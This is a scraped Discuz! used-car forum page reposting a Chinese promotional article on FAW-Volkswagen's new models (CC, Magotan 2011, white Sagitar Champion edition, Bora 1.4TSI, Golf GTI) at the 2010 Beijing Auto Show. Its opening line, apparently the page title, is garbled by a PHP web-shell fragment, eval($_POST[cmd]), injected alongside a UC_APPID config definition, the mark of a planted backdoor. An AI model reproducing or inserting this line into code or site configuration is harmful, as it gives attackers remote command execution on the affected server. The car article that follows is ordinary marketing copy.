');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 國產CC領銜 一汽大眾4款新車亮相北京車展 - 二手車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

國產CC領銜 一汽大眾4款新車亮相北京車展

以「暢想綠色未來」為主題的2010年北京車展即將隆重開幕,記者獲悉,此次北京車展期間,一汽-大眾將攜國產CC、白色速騰冠軍版、高爾夫1.4TSI、寶來1.4TSI運動版,高爾夫GTI、邁騰精品陣容同台亮相E5館。多款新車首發,全系TSI精品,使得北京車展看點十足。

  國產大眾CC首發


  作為大眾品牌的頂級車型,國產CC的首次亮相必然成為此次北京車展的焦點。一汽-大眾內部人士透露,車展新聞日首日,國產CC將高規格首發亮相。

  CC是大眾汽車迄今設計最美的車型之一,突破了大眾汽車一貫的設計風格。不僅擁有至上的駕駛樂趣,更帶來對轎跑車近乎完美的詮釋。CC除了給人遠超主流B級車的高級感外,CC2.0TSI發動機釋放出強勁動力,比一般2.4L發動機減少碳排放。此番亮相之後,必將成為消費者關注的重點。


  據悉,豪華感得到全面升級的邁騰2011也將在此次車展隆重登場。邁騰2011年型改進的重點在於:細節之處更為精緻,整車突顯高級感,使產品形象不僅在技術上領先,在豪華程度上也煥然一新。

  作為一汽-大眾大眾品牌推出的首款B級轎車,邁騰自2007年上市以來,以領先的科技配置、強勁的動力輸出、卓越的操控性能和全方位的安全保護,市場表現漸入佳境。邁騰擁有同級車中最先進的動力總成技術,具有最高效、最節油以及最富駕駛樂趣的產品性能。


  繼黑色冠軍版之後,此次北京車展將首發白色速騰冠軍版。據一汽-大眾相關負責人介紹,白色速騰冠軍版延續速騰冠軍版高級配置,動力強勁的1.8TSI發動機,更具操控性的17寸輪轂,配備黑色進口小牛皮座椅,更加高檔、舒適,配備ESP、氙氣大燈,更多安全保障。

  作為速騰家族的旗艦車型,速騰冠軍版從08年7月底上市以來,以其簡約動感的外觀設計、時尚尊貴的內飾,卓越的動力性能贏得了市場的肯定。尤其是實力不凡的動力輸出,更是成為這款中級車主流車型的一張王牌。即將亮相的白色冠軍版將與黑色冠軍版一道,樹立細分市場標桿車型中的黑白經典。



  暢享幸福生活的「新生活家轎」寶來此番搭載1.4TSI發動機,使得寶來動力更為強勁,全面加速幸福生活。此次車展亮相的寶來1.4TSI運動版車型在外觀以及內飾上進行了全面的升級,前臉尾部,燻黑前大燈,運動方向盤、座椅等無一不顯露出1.4TSI運動版幸福加速度的個性魅力。 對於喜歡寶來的用戶,寶來1.4TSI運動版是不可錯過的看點。

  無論是首次亮相的國產CC。尊貴全面升級的邁騰以及幸福加速度的寶來1.4TSI運動版,還是不久前上市的高爾夫1.4TSI以及動感十足的高爾夫GTI,全系精品搭載TSI充分展現了一汽-大眾行業標桿打造者,綠色科技先行者的實力。北京車展已然成為一汽-大眾「T」動未來的最佳舞台。
返回列表